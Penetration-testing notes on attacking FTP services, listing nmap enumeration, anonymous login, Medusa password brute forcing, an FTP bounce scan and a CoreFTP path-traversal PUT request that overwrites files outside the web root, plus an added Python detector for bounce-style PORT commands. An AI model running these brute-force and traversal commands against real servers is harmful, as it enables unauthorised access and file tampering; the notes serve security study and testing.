πŸ—ƒοΈFTP

Enumeration

sudo nmap -sC -sV -p 21 IP

Anonymous Access

ftp IP

Brute forcing with Medusa

medusa -u username -P /pass.txt -h IP -M ftp

Bounce Attack

A bounce attack uses an FTP server to deliver outbound traffic to another device on the network. We can use the PORT command to trick the connection into running commands.

This could be used to target a server that is on the same network as the FTP server but isn't exposed to the internet. We can use the connection to scan the unexposed server and find out whether it has any open ports.

nmap -Pn -v -n -p80 -b anonymous:password@serverIP AttackIP
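
Seen from the FTP server's side, a bounce scan shows up as PORT commands that name a host other than the connected client, often with a low port. The filter below is an added example, not part of the original notes; the log format ("<client_ip> <command>") and the sample lines are constructed for it.

```python
import re

# PORT h1,h2,h3,h4,p1,p2 names the address the server should connect to (RFC 959).
PORT_RE = re.compile(r"^PORT\s+" + r",".join([r"(\d{1,3})"] * 6) + r"\s*$", re.I)

def parse_port(command):
    """Return (ip, port) from a PORT command, or None if it is not a valid one."""
    m = PORT_RE.match(command.strip())
    if not m:
        return None
    nums = [int(g) for g in m.groups()]
    if any(n > 255 for n in nums):
        return None
    return ".".join(map(str, nums[:4])), nums[4] * 256 + nums[5]

def check_port(client_ip, command):
    """Return the reasons a PORT command looks like a bounce attempt (empty if none)."""
    parsed = parse_port(command)
    if parsed is None:
        return []
    ip, port = parsed
    reasons = []
    if ip != client_ip:
        reasons.append(f"data address {ip} differs from control peer {client_ip}")
    if port < 1024:
        reasons.append(f"data port {port} is privileged")
    return reasons

def scan(log_lines):
    """Return (client_ip, command, reasons) for each suspicious log entry.
    Assumed log format: '<client_ip> <FTP command line>'."""
    findings = []
    for line in log_lines:
        client_ip, _, command = line.strip().partition(" ")
        reasons = check_port(client_ip, command)
        if reasons:
            findings.append((client_ip, command, reasons))
    return findings

# Constructed sample log; addresses are placeholders.
SAMPLE_LOG = [
    "203.0.113.7 USER anonymous",
    "203.0.113.7 PORT 203,0,113,7,195,80",  # normal active mode: own IP, port 50000
    "203.0.113.7 PORT 172,17,0,2,0,80",     # third-party host, port 80
    "203.0.113.7 PORT 203,0,113,7,0,22",    # own IP but privileged port
]

if __name__ == "__main__":
    for client, cmd, reasons in scan(SAMPLE_LOG):
        print(client, cmd, "->", "; ".join(reasons))
```

An FTP server that refuses PORT arguments failing either test cannot be used as a relay in this way.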

Latest Vulnerabilities

The FTP service uses an HTTP POST request to upload files.

The CoreFTP service also allows PUT requests, which let us write content to files.

We create a PUT request (-X PUT) with basic auth, the path for the file, and the content we want to write:

curl -k -X PUT -H "Host: <IP>" --basic -u <username>:<password> --data-binary "PoC." --path-as-is https://<IP>/../../../../../../whoops

We should now be able to check the target system; the file should have been overwritten.
